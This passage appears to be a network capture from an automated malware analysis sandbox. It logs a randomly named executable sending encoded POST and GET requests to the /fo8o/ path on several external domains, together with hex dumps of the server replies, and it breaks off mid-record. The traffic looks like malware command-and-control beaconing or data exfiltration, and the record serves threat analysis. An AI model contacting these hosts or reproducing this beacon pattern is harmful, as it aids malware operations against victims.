Jun 8, 2024 18:17:17.184549093 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 08 Jun 2024 16:17:17 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49777	217.196.55.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:19.095727921 CEST	10884	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 78 48 57 62 6e 4e 6e 39 58 44 6b 63 50 7a 63 2f 49 66 5a 6e 42 33 59 7a 51 6e 57 4b 66 49 72 65 6b 75 34 32 30 73 63 6f 4b 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 5a 52 39 30 30 4c 6f 68 32 6c 42 77 34 6d 37 61 5a 69 6a 72 67 32 72 76 49 72 5a 7a 56 34 75 5a 39 32 42 53 54 4b 34 66 6a 2f 42 38 4e 6d 64 70 76 4c 64 4f 51 6b 65 66 4c 34 52 42 45 32 54 6a 57 6c 79 4a 38 76 47 6d 71 67 48 44 62 38 46 50 65 56 4b 37 [TRUNCATED] Data Ascii: aZ=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJxHWbnNn9XDkcPzc/IfZnB3YzQnWKfIreku420scoKATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHZR900Loh2lBw4m7aZijrg2rvIrZzV4uZ92BSTK4fj/B8NmdpvLdOQkefL4RBE2TjWlyJ8vGmqgHDb8FPeVK7i3wjnW4Pkze5PVOi1QX827zWpkmljH0ttuiIp3QemGg1xQL6nC37nf6XPI4KATMgnVAKME42Z8DL8OybVLpktW6GlxYlU5aI0OpSMJSB4iJRacAN12s2+zc2ARHpFe90cC5U7+mKvZl2yMu8smqwJpNXkSTLUB8JW36BpgzKjTATzL/D1RlQZmMo7+IT5MAsmfDWkWGxGnylL78IzMeSiC9hMlVnpVRDCU5SM4jzvqdIO1s1t1askykCWpwY9wYfHRRA9iTk9HKitsqtVy41gY9YkVKq1RwBhDLTNWY/dQ6g5k4ErKWnmMSZOfYNmHe6uYO+jKxiATAaAERvIpDJfEcBj7wUSFIFuZQAfApvKYpYVtd1CAQte3+V12D6numDy1w2VPWnIKF3xJWfie2IqH0c0iusz09pLReNQv4O0ppV+kALBooou/oMbCnF0CR/pNgJuLc7H7RpmmEFD3/buWJ/BosMnnN3kbzP/LY8gGepMRZk8f5aQCTg/NlPQpwRSIrex4Xbe9T720PRkZoHfkkdtqOpqVW73vhJj4v5PcVmldOF6+gluDjnrRriUwvRUVEXfR2b3hUI5RnHvFqyYrbfV2d6LBYOUsw13oMdbhY7gTrPN6ruraLewSydN24N73HoTY6DF9B0vmGZGuVzmxcwh2ZI9KrUQr [TRUNCATED]
Jun 8, 2024 18:17:19.722812891 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 08 Jun 2024 16:17:19 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49778	217.196.55.202	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:21.628308058 CEST	501	OUT	GET /fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 8, 2024 18:17:22.253537893 CEST	1203	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 08 Jun 2024 16:17:22 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?aZ=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&qD=FrMTb platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49779	104.206.198.212	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:43.701431036 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 199 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 34 68 6a 44 69 70 55 78 68 39 63 4c 72 35 7a 73 7a 65 6b 63 35 62 79 70 46 35 44 63 36 64 63 53 6f 77 3d 3d Data Ascii: aZ=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ4hjDipUxh9cLr5zszekc5bypF5Dc6dcSow==
Jun 8, 2024 18:17:44.437335968 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 08 Jun 2024 16:17:45 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49780	104.206.198.212	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:46.240709066 CEST	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 219 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 57 61 59 2b 4b 6f 33 65 68 62 7a 36 57 36 39 48 64 6a 2f 79 76 66 6d 53 78 66 55 4b 6c 50 32 74 63 3d Data Ascii: aZ=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbWaY+Ko3ehbz6W69Hdj/yvfmSxfUKlP2tc=
Jun 8, 2024 18:17:46.968317032 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 08 Jun 2024 16:17:48 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t\|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP<<e%03\|cn6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6R]A??m/33.6%x+;hp89RQ{=~f>7Ano_0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49781	104.206.198.212	80	3264	C:\Program Files (x86)\VWGQPjLsoLsAJsTOCmYZmjmrRyBuclcNjqYyCppVtsiRZUjzJIxBPXUQlXUlWw\fIuefTlcmxsHvlw.exe

Timestamp	Bytes transferred	Direction	Data
Jun 8, 2024 18:17:48.782186031 CEST	10878	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.shenzhoucui.com Origin: http://www.shenzhoucui.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10299 Referer: http://www.shenzhoucui.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 61 5a 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 70 38 6b 6d 34 54 7a 61 5a 79 34 4f 61 57 63 65 4f 30 6d 69 69 56 51 52 36 78 74 52 58 59 73 35 39 39 6b 50 46 4b 63 54 46 45 48 45 45 4f 59 48 31 66 43 51 63 50 6e 39 79 36 64 65 68 2b 44 74 73 4d 41 6f 2f 2b 37 75 56 72 44 36 4b 71 35 47 72 4f 6a 6d 63 2b 39 61 46 6b 68 38 49 37 6f 45 49 52 32 66 61 61 64 32 2f 61 6d 69 6d 59 38 49 73 74 76 48 34 59 36 41 57 75 67 61 6b 7a 75 35 5a 72 68 34 50 76 77 65 4a 7a 2b 35 57 37 45 50 66 4b 34 2f 4e 59 36 35 61 4e 35 46 56 6e 69 54 2b 74 6d 52 63 53 42 49 55 49 69 39 37 31 4d 6c 62 59 79 45 62 4a 2b 47 51 65 69 79 74 6f 63 41 52 77 33 34 4e 5a 6e 61 6e 47 42 71 33 49 79 42 72 37 42 56 43 48 71 43 68 48 64 35 6c 64 58 75 44 68 31 72 75 37 32 6f 30 41 49 66 39 65 65 6b 69 42 54 34 65 79 78 54 56 57 6e 38 39 61 75 77 48 73 77 75 47 47 2f 6c 41 67 61 32 48 51 71 47 4c 51 73 4b 55 79 6f 69 2f 47 58 6f 38 4f 67 74 34 4e 6c 48 34 [TRUNCATED] Data Ascii: aZ=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqp8km4TzaZy4OaWceO0miiVQR6xtRXYs599kPFKcTFEHEEOYH1fCQcPn9y6deh+DtsMAo/+7uVrD6Kq5GrOjmc+9aFkh8I7oEIR2faad2/amimY8IstvH4Y6AWugakzu5Zrh4PvweJz+5W7EPfK4/NY65aN5FVniT+tmRcSBIUIi971MlbYyEbJ+GQeiytocARw34NZnanGBq3IyBr7BVCHqChHd5ldXuDh1ru72o0AIf9eekiBT4eyxTVWn89auwHswuGG/lAga2HQqGLQsKUyoi/GXo8Ogt4NlH4qxA7ETIWX30lkl8VsK8E21MdyZsL5zKhFvGqGHoi+1AVNR6sVDJLtr8scR+c6YKBCP8+O7zlb/k+07M+3lthslPknF7hpWDv/1HWJ8AlgsJaJSbVa7zNQG4DyfrJqu/GnR5uTvEk03cxiQqsrRdeAohRaBkxe3bXbWEcyoviDBRwn83KSyXsYekCOjy66qz724hKJrG4/3dkGaCX50H309OrVfQGviZkK1SO7URRGPhgEHpuW28NO7pfXYAaNKH6hGCqUbLyhx+9Fj3Dri28X3YPYmCGZkIYz8ZjzQIjop+6cDv8sys1OISuCLQzAI9J6cHReEdbYVqsFERAvBKB3q/2jN0hvBRmWH0eWfx8ggR3GsRaTkcFJPM4rlmokX50/N4HVXFfRe60TW2r54nxHRNV2E0ZUlkmdpGzG2y2LqlmxLYffzrq8cD5CeE2cLNipOAObXAfS6sXaxgEJIabveNdOvhW1+vhhd7ZIKTjpj9z3sX95KqsMP6CxXvIOHBgGDiguWrYp72NwXhT4kT3kTorILVQoLc3NZlRRkte3i5KIUOcKgIB9gP8qjX9Lw8/0Kd3OZjXzCjqybwwiCEjJKRaprtBv2GNmi2jZjudZmhJx+VYPPy6GID24OHMx8o/pVUVmJuggX+EploiiefABuQuIV5OlvcjdU [TRUNCATED]
Jun 8, 2024 18:17:49.494482994 CEST	1037	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 08 Jun 2024 16:17:51 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.4.41 Content-Encoding: gzip Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED] Data 